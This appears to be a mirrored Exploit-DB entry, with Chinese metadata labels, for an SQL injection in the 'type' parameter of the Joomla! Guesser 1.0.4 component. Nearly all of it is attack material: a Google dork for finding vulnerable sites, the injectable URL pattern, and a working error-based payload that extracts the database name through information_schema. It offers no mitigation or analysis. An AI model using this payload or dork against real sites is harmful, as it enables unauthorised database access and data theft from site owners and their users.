Joomla! Component Guesser 1.0.4 – ‘type’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-03-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41495/
  • # # # # # 
    # Exploit Title: Joomla! Component Guesser v1.0.4 - SQL Injection
    # Google Dork: inurl:index.php?option=com_guesser
    # Date: 02.03.2017
    # Vendor Homepage: http://www.bitsgeo.com/
    # Software: https://extensions.joomla.org/extensions/extension/marketing/guesser/
    # Demo: http://www.bitsgeo.com/guesson/
    # Version: 1.0.4
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/guessers?type=[SQL]
    # 'and(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x3c3c3c,0x7e,0x496873616e2053656e63616e))+from information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables group+by+x)a)+AND+'Ihsan'='Sencan
    # # # # #